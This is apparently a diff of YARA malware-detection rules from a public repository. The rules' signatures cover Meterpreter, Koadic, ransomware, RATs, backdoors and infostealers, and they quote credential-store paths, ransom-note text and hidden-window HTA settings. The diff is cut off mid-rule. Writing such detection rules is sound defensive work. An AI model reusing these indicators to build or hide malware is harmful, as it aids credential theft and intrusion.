- $x1 = { 2e 65 78 65 00 00 84 00 00 4d 5a 90 00 } - $x2 = "This program cannot be run in DOS mode" ascii + $s1 = "add_Connected" fullword ascii + $s2 = "Statconnected" fullword ascii + $s3 = "StartConnect" fullword ascii + $s4 = "TelegramTitleDetect" fullword ascii + $s5 = "StartTitleTelegram" fullword ascii + $s6 = "Check_titles" fullword ascii + $s7 = "\\MoDi RAT V" ascii + $s8 = "IsBuzy" fullword ascii + $s9 = "Recording_Time" fullword wide condition: - (( uint16(0)==0x5a4d and all of ($s*)) or all of them ) + ( uint16(0)==0x5a4d and 7 of them ) or all of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Meterpreter : FILE +rule DITEKSHEN_MALWARE_DOC_Koadicdoc : FILE { meta: - description = "Detects Meterpreter payload" + description = "Koadic post-exploitation framework document payload" author = "ditekSHen" - id = "d72fef80-d624-5e39-963a-8d7c12eb2d9c" - date = "2024-09-06" - modified = "2024-09-06" + id = "76d6c8df-4e42-5c0a-8344-f8848e7ac945" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3330-L3343" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "5226cd7bb2344b822ee94d75f81a523ff701778de97a32ae52c604a4855e960c" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1160-L1174" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "9f0538e1faee737a08d403a7f321ce45bdc70b390accfe378ba0d26292509fd7" score = 75 - quality = 75 + quality = 50 tags = "FILE" strings: - $s1 = "PACKET TRANSMIT" fullword ascii - $s2 = "PACKET RECEIVE" fullword ascii - $s3 = "\\\\%s\\pipe\\%s" fullword ascii wide - $s4 = "%04x-%04x:%s" fullword wide - $s5 = "server.dll" fullword ascii + $s1 = "&@cls&@set" ascii + $s2 = /:~\d+,1%+/ ascii + $s3 = "Header Char" fullword wide + $s4 = "EMBED Package" ascii + $b1 = ".bat\"%" ascii + $b2 = ".bat');\\\"%" ascii + $b3 = ".bat',%" ascii condition: - ( uint16(0)==0x5a4d and all of them ) or ( filesize <300KB and all of them ) + uint16(0)==0xcfd0 and all of ($s*) and 2 of ($b*) } import "pe" -rule DITEKSHEN_MALWARE_Win_Trojan_Expresscms : FILE +rule DITEKSHEN_MALWARE_BAT_Koadicbat : FILE { meta: - description = "Detects ExpressCMS" + description = "Koadic post-exploitation framework BAT payload" author = "ditekSHen" - id = "d096db0c-05f6-5b69-9d84-0105f2182ff3" - date = "2024-09-06" - modified = "2024-09-06" + id = "dad7bb32-b1f1-5c6d-89b2-77cc49b5f020" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3366-L3382" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "64d551e0c11b6394f9ae2b8fa749c36cb1b5c3f498592f95dc19fdea23c53160" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1176-L1186" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "1ee6c0189a5111c61af1dbe571524427bff95a7e3907f97ce51d272a8f701cf5" score = 75 - quality = 75 + quality = 50 tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.ExpressCMS" strings: - $s1 = "/click.php?cnv_id=" fullword wide - $s2 = "/click.php?key=" wide - $s3 = "jdlnb" fullword wide - $s4 = "Gkjfdshfkjjd: dsdjdsjdhv" fullword wide - $s5 = "--elevated" fullword wide - $s6 = "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\%d" wide - $s7 = "\\Microsoft\\Manager.exe" fullword wide - $s8 = "\\Microsoft\\svchost.exe" fullword wide + $v1_1 = "&@cls&@set" ascii + $v2_1 = { 26 63 6c 73 0d 0a 40 25 } + $m1 = /:~\d+,1%+/ ascii condition: - uint16(0)==0x5a4d and 6 of them + uint16(0)==0xfeff and ((1 of ($v1*) or 1 of ($v2*)) and #m1>100) } import "pe" -rule DITEKSHEN_MALWARE_Win_Meterpreterstager : FILE +rule DITEKSHEN_MALWARE_JS_Koadicjs { meta: - description = "Detects Meterpreter stager payload" + description = "Koadic post-exploitation framework JS payload" author = "ditekSHen" - id = "dfbc37e9-13e0-55e2-a501-1005eea52b63" - date = "2024-09-06" - modified = "2024-09-06" + id = "8598d5cb-0486-52b0-a686-6bd014f35c44" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3384-L3395" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "0ac53a10abb1e4dd7da57872cd1779851d953127a912c31a5e411d8eb9bd07f4" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1188-L1208" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "689116f74996fecf4c16c224e8cd842ad5b5e989de2dfdf0debeb9a26d8a12fa" score = 75 quality = 75 - tags = "FILE" + tags = "" strings: - $s1 = "PAYLOAD:" fullword ascii - $s2 = "AQAPRQVH1" fullword ascii - $s3 = "ws2_32" fullword ascii - $s4 = "KERNEL32.dll" fullword ascii + $s1 = "window.moveTo(-" ascii + $s2 = "window.onerror = function(sMsg, sUrl, sLine) { return false; }" fullword ascii + $s3 = "window.onfocus = function() { window.blur(); }" fullword ascii + $s4 = "window.resizeTo(" ascii + $s5 = "window.blur();" fullword ascii + $hf1 = "<hta:application caption=\"no\" windowState=\"minimize\" showInTaskBar=\"no\"" fullword ascii + $hf2 = "<hta:application caption=\"no\" showInTaskBar=\"no\" windowState=\"minimize\" navigable=\"no\" scroll=\"no\"" + $ht1 = "<hta:application" ascii + $ht2 = "caption=\"no\"" ascii + $ht3 = "showInTaskBar=\"no\"" ascii + $ht4 = "windowState=\"minimize\"" ascii + $ht5 = "navigable=\"no\"" ascii + $ht6 = "scroll=\"no\"" ascii condition: - uint16(0)==0x5a4d and all of them and filesize <100KB + all of ($s*) and (1 of ($hf*) or all of ($ht*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Ziggy : FILE +rule DITEKSHEN_MALWARE_Win_NETEAGLE : FILE { meta: - description = "Detects Ziggy ransomware" + description = "NETEAGLE backdoor payload" author = "ditekSHen" - id = "6d2d316a-cf19-5001-bf94-842346229d76" - date = "2024-09-06" - modified = "2024-09-06" + id = "89d1304a-63a0-50fc-855a-2e36cde1c5e7" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3397-L3421" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "103a50511971161ca673e0c8378aeca2fa7d0f6309966bbb2b70e0d039e0f196" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1210-L1225" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "148de0ca332d3885d94eae8d15eb4aaa2bc4950c691c0e8817c816b7d4c55510" score = 75 quality = 75 tags = "FILE" - snort2_sid = "920098" - snort3_sid = "920096" - clamav_sig = "MALWARE.Win.Ransomware.Ziggy" strings: - $id1 = "/Ziggy Info;component/mainwindow.xaml" fullword wide - $id2 = "AZiggy Info, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" fullword ascii - $id3 = "Ziggy Ransomware" fullword wide - $id4 = "clr-namespace:Zeggy" fullword ascii - $s1 = "GetCooldown" fullword ascii - $s2 = "checkCommandMappings" fullword ascii - $s3 = "add_OnExecuteCommand" fullword ascii - $s4 = "MindLated.jpg" fullword wide - $s5 = "http://fixfiles.xyz/ziggy/api/info.php?id=" fullword wide - $s6 = "Reamaining time:" fullword wide - $msg1 = "<:In case of no answer in 12 hours write us to this e-mail" ascii - $msg2 = "Free decryption as guarantee" fullword ascii - $msg3 = "# Do not try to decrypt your data using third party software, it may cause permanent data loss" ascii - $msg4 = "# Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can becom" ascii + $s1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" fullword ascii + $s2 = "System\\CurrentControlSet\\control\\ComputerName\\ComputerName" fullword ascii + $s3 = "Mozilla/4.0 (compatible; MSIE 5.0; Win32)" fullword ascii + $s4 = "/index.htm" fullword ascii + $s5 = "Help_ME" fullword ascii + $s6 = "GOTO ERROR" ascii + $s7 = "127.0.0.1" fullword ascii + $s8 = /pic\d\.bmp/ ascii wide condition: - uint16(0)==0x5a4d and (3 of ($id*) or 4 of ($s*) or 3 of ($msg*)) + uint16(0)==0x5a4d and 7 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Nworm : FILE +rule DITEKSHEN_MALWARE_WIN_BACKSPACE : FILE { meta: - description = "Detects NWorm/N-W0rm payload" + description = "BACKSPACE backdoor payload" author = "ditekSHen" - id = "06546ccf-8914-5b1c-942f-99664b9ecf44" - date = "2024-09-06" - modified = "2024-09-06" + id = "ff9b1c2e-66a1-5e09-8bc2-a7543161e518" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3423-L3443" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "a1397a057422be260b5bdf1eb58571e95c259c132cc2518b39e1524a0eda9c66" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1227-L1247" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "3d366327c2272761349687b11e4d6baada5000936dc7f81665e0303f7d1e5121" score = 75 quality = 75 tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.NWorm" strings: - $id1 = "N-W0rm" ascii - $id2 = "N_W0rm" ascii - $x1 = "pongPing" fullword wide - $x2 = "|NW|" fullword wide - $s1 = "runFile" fullword wide - $s2 = "runUrl" fullword wide - $s3 = "killer" fullword wide - $s4 = "powershell" fullword wide - $s5 = "wscript.exe" fullword wide - $s6 = "ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File \"" fullword wide - $s7 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36" fullword wide - $s8 = "Start-Sleep -Seconds 1.5; Remove-Item -Path '" fullword wide + $s1 = "Software\\Microsoft\\PnpSetup" ascii wide + $s2 = "Mutex_lnkword_little" ascii wide + $s3 = "(Prxy%c-%s:%u)" fullword ascii + $s4 = "(Prxy-No)" fullword ascii + $s5 = "/index.htm" fullword ascii + $s6 = "CONNECT %s:%d" ascii + $s7 = "\\$NtRecDoc$" fullword ascii + $s8 = "qazWSX123$%^" ascii + $s9 = "Software\\Microsoft\\Core" ascii wide + $s10 = "Mutex_lnkch" ascii wide + $s11 = "Event__lnkch__" ascii wide + $s12 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)" fullword ascii + $s13 = "User-Agent: Mozilla/5.00 (compatible; MSIE 6.0; Win32)" fullword ascii condition: - uint16(0)==0x5a4d and ((1 of ($id*) and (1 of ($x*) or 3 of ($s*))) or ( all of ($x*) and 2 of ($s*)) or 7 of ($s*) or 10 of them ) + uint16(0)==0x5a4d and 8 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Qakbot : FILE +rule DITEKSHEN_MALWARE_Win_Rhttpctrl : FILE { meta: - description = "Detects variants of QakBot payload" + description = "RHttpCtrl backdoor payload" author = "ditekSHen" - id = "3a3b3b6c-0969-584e-a184-7acfca3cdd42" - date = "2024-09-06" - modified = "2024-09-06" + id = "fa80db13-90af-5d6a-bcc2-ad1f6808268e" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3445-L3457" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "b64c05eb7ac03b2b4709f9979d117e4cacc617f21d0b3bf1c1be42aa18cc44cc" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1249-L1265" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "a8b27fcc4636c2fe02a0e006295ece7f705cc9a042921f66ef1f9b6a88aaf9a1" score = 75 - quality = 73 + quality = 75 tags = "FILE" strings: - $s1 = "stager_1.dll" fullword ascii - $s2 = "_vsnwprintf" fullword ascii - $s3 = "DllRegisterServer" fullword ascii - $s4 = "Win32_PnPEntity" fullword wide - $s5 = "0>user32.dll" fullword ascii + $s1 = "%d_%04d%02d%02d%02d%02d%02d." ascii + $s2 = "ver=%s&id=%06d&type=" ascii + $s3 = "ver=%d&id=%s&random=%d&" ascii + $s4 = "id=%d&output=%s" ascii + $s5 = "Error:WinHttpCrackUrl failed!/n" ascii + $s6 = "Error:SendRequest failed!/n" ascii + $s7 = ".exe a %s %s" ascii + $s8 = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0" fullword wide + $pdb = "\\WorkSources\\RHttpCtrl\\Server\\Release\\svchost.pdb" ascii condition: - uint16(0)==0x5a4d and all of them + uint16(0)==0x5a4d and (5 of ($s*) or ($pdb and 2 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Fonix : FILE +rule DITEKSHEN_MALWARE_Win_Pillowmint : FILE { meta: - description = "Detects Fonix ransomware" + description = "PillowMint POS payload" author = "ditekSHen" - id = "d67cce49-5f4f-59f6-b2a9-9c4dd1c6c0f6" - date = "2024-09-06" - modified = "2024-09-06" + id = "e3d26a12-45aa-5f5d-997a-f350bc1bea97" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3459-L3481" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "159b8946f7772c76271de821eb12897689bf73d96fc6a1d7c4a65cdc50b877c7" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1267-L1283" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "ed2597fce1c56d2e110790e0eb89834b1bb9f6f52d39105157c9ffe2ede6cc7a" score = 75 quality = 75 tags = "FILE" - clamav_sig = "MALWARE.Win.Ransomware.Fonix" strings: - $s1 = "dontcryptanyway" fullword wide - $s2 = "Cpriv.key" ascii wide - $s3 = "Cpub.key" ascii wide - $s4 = "NetShareEnum() failed!Error: % ld" fullword wide - $s5 = "<div class='title'> Attention!</div><ul><li><u><b>DO NOT</b> pay" wide - $s6 = "Encryption Completed !!!" fullword wide - $s7 = "kill process" fullword ascii - $s8 = "Copy SystemID C:\\ProgramData\\SystemID" ascii - $id1 = "].FONIX" fullword wide - $id2 = "xinofconfig.txt" fullword ascii wide - $id3 = "XINOF4MUTEX" wide - $id4 = ":\\Fonix\\cryptoPP\\" ascii - $id5 = "schtasks /CREATE /SC ONLOGON /TN fonix" ascii - $id6 = "Ransomware\\Fonix" ascii + $s1 = "system32\\sysvols\\" ascii nocase + $s2 = "Sysnative\\sysvols\\" ascii nocase + $s3 = "critical.log" fullword ascii + $s4 = "log.log" fullword ascii + $s5 = "commands.txt" fullword ascii + $s6 = "_EV0LuTi0N_" ascii + $s7 = /(file|reg)\scmd:/ fullword ascii + $s8 = "dumper_nologs_" ascii + $s9 = "ReflectiveLoader" ascii condition: - uint16(0)==0x5a4d and (6 of ($s*) or 3 of ($id*) or (1 of ($id*) and 3 of ($s*))) + uint16(0)==0x5a4d and 6 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Bobik : FILE +rule DITEKSHEN_MALWARE_Win_Blackshadesrat : FILE { meta: - description = "Detects Bobik infostealer" + description = "BlackshadesRAT / Cambot POS payload" author = "ditekSHen" - id = "12f14151-0c89-519d-85d3-4b4b82a950a3" - date = "2024-09-06" - modified = "2024-09-06" + id = "bd0ad920-109a-50b5-94af-6580684bff52" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3483-L3498" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "735dcb9e04956863305ca89a43686b8e48e3b20784ae9292cfc40d1c2c09d467" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1285-L1300" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "5c2a76ce52bce9c37a3518ff459011acb733c2c5abac74786e41a1c169459ce2" score = 75 quality = 75 tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.Bobik" + snort_sid = "920208-920210" strings: - $s1 = "@Default\\Login Data" fullword ascii - $s2 = "@Default\\Cookies" fullword ascii - $s3 = "@logins.json" fullword ascii - $s4 = "@[EXECUTE]" fullword ascii - $s5 = "@C:\\Windows\\System32\\cmd.exe" fullword ascii - $s6 = /(CHROME|OPERA|FIREFOX)_BASED/ fullword ascii - $s7 = "threads.nim" fullword ascii + $s1 = "bhookpl.dll" fullword wide + $s2 = "drvloadn.dll" fullword wide + $s3 = "drvloadx.dll" fullword wide + $s4 = "SPY_NET_RATMUTEX" fullword wide + $s5 = "\\dump.txt" fullword wide + $s6 = "AUTHLOADERDEFAULT" fullword wide + $pdb = "*\\AC:\\Users\\Admin\\Desktop_old\\Blackshades project\\bs_bot\\bots\\bot\\bs_bot.vbp" fullword wide condition: - uint16(0)==0x5a4d and 5 of them + uint16(0)==0x5a4d and (4 of ($s*) or ($pdb and 2 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Runningrat : FILE +rule DITEKSHEN_MALWARE_Win_Goldenspy : FILE { meta: - description = "Detects RunningRAT" - author = "ditekSHen" - id = "161faa8c-614e-5102-bb6d-c1ed4abf8274" - date = "2024-09-06" - modified = "2024-09-06" - reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3500-L3536" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "e3cddec792ad95d823190f12970b8e0515b73be4a91f89cbb2bbde2fa1cfde63" + description = "GoldenSpy dropper payload" + author = "SpiderLabs Trustwave" + id = "01d3f14a-fefb-5cea-b055-d7e9f4c7d13b" + date = "2024-09-23" + modified = "2024-09-23" + reference = "https://trustwave.azureedge.net/media/16908/the-golden-tax-department-and-emergence-of-goldenspy-malware.pdf" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1302-L1314" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "908047db2167733da0089375dbfd636881e721cc219da110755b81581d438cfa" score = 75 - quality = 23 + quality = 67 tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.RunningRAT" strings: - $s1 = "%s%d.dll" fullword ascii - $s2 = "/c ping 127.0.0.1 -n" ascii - $s3 = "del /f/q \"%s\"" ascii - $s4 = "GUpdate" fullword ascii - $s5 = "%s\\%d.bak" fullword ascii - $s6 = "\"%s\",MainThread" ascii - $s7 = "rundll32.exe" fullword ascii - $rev1 = "emankcosteg" fullword ascii - $rev2 = "ini.revreS\\" fullword ascii - $rev3 = "daerhTniaM,\"s%\" s%" ascii - $rev4 = "s% etadpUllD,\"s%\" 23lldnuR" ascii - $rev5 = "---DNE yromeMmorFdaoL" fullword ascii - $rev6 = "eMnigulP" fullword ascii - $rev7 = "exe.23lldnuR\\" fullword ascii - $rev8 = "dnammoc\\nepo\\llehs\\" ascii - $rev9 = "\"s%\" k- exe.tsohcvs\\23metsyS\\%%tooRmetsyS%" ascii - $rev10 = "emanybtsohteg" fullword ascii - $rev11 = "tekcosesolc" fullword ascii - $rev12 = "tpokcostes" fullword ascii - $rev13 = "emantsohteg" fullword ascii - $v2_1 = "%%SystemRoot%%\\System32\\svchost.exe -k \"%s\"" fullword ascii - $v2_2 = "LoadFromMemory END---" fullword ascii - $v2_3 = "hmProxy!= NULL" fullword ascii - $v2_4 = "Rundll32 \"%s\",DllUpdate %s" fullword ascii - $v2_5 = "ipip.website" fullword ascii - $v2_6 = "%d*%sMHz" fullword ascii - $v2_7 = "\\Server.ini" fullword ascii + $reg = "Software\\IDG\\DA" nocase wide ascii + $str1 = "requestStr" nocase wide ascii + $str2 = "nb_app_log_mutex" nocase wide ascii + $str3 = { 510F4345[0-10]50518D8DCCFE[0-20]837D1C[0-20]8D45[0-15]0F4345[0-20]505157 } condition: - uint16(0)==0x5a4d and ( all of ($s*) or 5 of ($rev*) or 6 of ($v*) or 8 of them ) + ( uint16(0)==0x5A4D) and $reg and 2 of ($str*) } import "pe" -rule DITEKSHEN_MALWARE_Win_Dlagent05 : FILE +rule DITEKSHEN_MALWARE_Win_Plurox : FILE { meta: - description = "Detects an unknown dropper. Typically exisys as a DLL in base64-encoded gzip-compressed file embedded within another executable" + description = "Plurox backdoor payload" author = "ditekSHen" - id = "a8a72484-42be-5c5c-962b-75bed8acdf39" - date = "2024-09-06" - modified = "2024-09-06" + id = "c8a97132-c1d5-5456-a055-d46a9399dbdd" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3538-L3551" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "e8c7c03451bbfcba7a1ab02f8c1320ad50d17d2e990f0e2f89942faea2a1e531" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1316-L1328" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "c2ec2ce7a9210d8eebb06c755eab51cab93fe6d48d737fd1756ffe42d46b35d1" score = 75 quality = 75 tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.DLAgent05" strings: - $s1 = "MARCUS.dll" fullword ascii wide - $s2 = "GZipStream" fullword ascii - $s3 = "MemoryStream" fullword ascii - $s4 = "proj_name" fullword ascii - $s5 = "res_name" fullword ascii + $s1 = "autorun.c" fullword ascii + $s2 = "launcher.c" fullword ascii + $s3 = "loader.c" fullword ascii + $s4 = "stealth.c" fullword ascii + $s5 = "RunFromMemory" fullword ascii condition: uint16(0)==0x5a4d and all of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Nemty : FILE +rule DITEKSHEN_MALWARE_Win_Avalon : FILE { meta: - description = "Detects Nemty/Nefilim ransomware" + description = "Avalon infostealer payload" author = "ditekSHen" - id = "361269c6-5215-5ecf-869c-3c55ff8387e1" - date = "2024-09-06" - modified = "2024-09-06" + id = "3de01419-9f45-5d82-8391-2e1e41df2b34" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3553-L3577" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "dcebcddc472f4fb3bb34c35fc5a5424e54bfc3a262fdae10b189d210217b9b37" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L1330-L1359" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "1aa9dc09ec4c8962dee0455dd367e32139e4c03f1b306f17ac6e82d71aacf713" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "Go build ID:" ascii - $s2 = "GOMAXPROCSGetIfEntryGetVersionGlagoliticKharoshthiManichaeanOld_ItalicOld_PermicOld_TurkicOther_MathPOSTALCODEPhoenicianSaurasht" ascii - $s3 = "crypto/x509.ExtKeyUsage" ascii - $s4 = "crypto/x509.KeyUsageContentCommitment" ascii - $s5 = "DEK-Info header" ascii - $s6 = "GetUserProfileDirectoryWMagallanes Standard TimeMontevideo Standard TimeNorth Asia Standard TimePacific SA Standard TimeQueryPerformanceCounter" fullword ascii - $s7 = "*( - < = > k= m=%: +00+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12..." ascii - $s8 = "Go cmd/compile go1.10" fullword ascii - $s9 = ".dllprogramdatarecycle.bin" ascii - $s10 = ".dll.exe.lnk.sys.url" ascii - $vx1_1 = "Fa1led to os.OpenFile()" ascii - $vx1_2 = "-HELP.txt" ascii - $vf1_1 = "main.CTREncrypt" fullword ascii - $vf1_2 = "main.FileSearch" fullword ascii - $vf1_3 = "main.getdrives" fullword ascii - $vf1_4 = "main.RSAEncrypt" fullword ascii - $vf1_5 = "main.SaveNote" fullword ascii - - condition: - uint16(0)==0x5a4d and (9 of ($s*) or ( all of ($vx*) and 2 of ($s*)) or all of ($vf*)) -} -import "pe" - -rule DITEKSHEN_MALWARE_Win_Qnapcrypt : FILE -{ - meta: - description = "Detects QnapCrypt/Lockedv1/Cryptfile2 ransomware" - author = "ditekSHen" - id = "3ef5643a-f2af-5d62-8927-e46679e069c2" - date = "2024-09-06" - modified = "2024-09-06" - reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3579-L3607" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "68fc3f0503d82295ffa5bfb49bda8b790142913217775a2812e3965a6c9a1fe1" - score = 75 - quality = 73 - tags = "FILE" - - strings: - $go = "Go build ID:" ascii - $s1 = "Encrypting %s..." ascii - $s2 = "\\Start Menu\\Programs\\StartUp\\READMEV" ascii - $s3 = "main.deleteRecycleBin" ascii - $s4 = "main.encryptFiles" ascii - $s5 = "main.antiVirtualBox" ascii - $s6 = "main.antiVmware" ascii - $s7 = "main.deleteShadows" ascii - $s8 = "main.delUAC" ascii - $s9 = "main.KillProcess" ascii - $s10 = "main.delExploit" ascii - $s11 = "main.encrypt" ascii - $s12 = "main.ClearLogDownload" ascii - $s13 = "main.ClearLog" ascii - $s14 = "main.EndEncrypt" ascii - $s15 = "main.RunFuckLogAndSoft" ascii - $s16 = "main.ClearUsercache" ascii - $s17 = "main.FirstDuty" ascii - $s18 = ".lockedv1" ascii - $s19 = "WSAStartup\\clear.bat\\ngrok.exe\\video.mp4" ascii - $s20 = "net stop " ascii + $s1 = "Parsecards" fullword ascii + $s2 = "Please_Gofuckyouself" fullword ascii + $s3 = "GetDomainDetect" fullword ascii + $s4 = "GetTotalCommander" fullword ascii + $s5 = "KnownFolder" fullword ascii + $s6 = "set_hidden" fullword ascii + $s7 = "set_system" fullword ascii + $l1 = "\\DomainDetect.txt" wide + $l2 = "\\Grabber_Log.txt" wide + $l3 = "\\Programs.txt" wide + $l4 = "\\Passwords_Edge.txt" wide + $l5 = "\\KL.txt" wide + $w1 = "dont touch" fullword wide + $w2 = "Grabber" fullword wide + $w3 = "Keylogger" fullword wide + $w4 = "password-check" fullword wide + $w5 = "H4sIAAAAAAAEA" wide + $p1 = "^(?!:\\/\\/)([a-zA-Z0-9-_]+\\.)*[a-zA-Z0-9][a-zA-Z0-9-_]+\\.[a-zA-Z]{2,11}?$" wide + $p2 = "^([a-zA-Z0-9_\\-\\.]+)@([a-zA-Z0-9_\\-\\.]+)\\.([a-zA-Z]{2,5})$" wide condition: - uint16(0)==0x5a4d and $go and 6 of ($s*) + uint16(0)==0x5a4d and 8 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Alfonoso : FILE +rule DITEKSHEN_MALWARE_Linux_Kinsing : 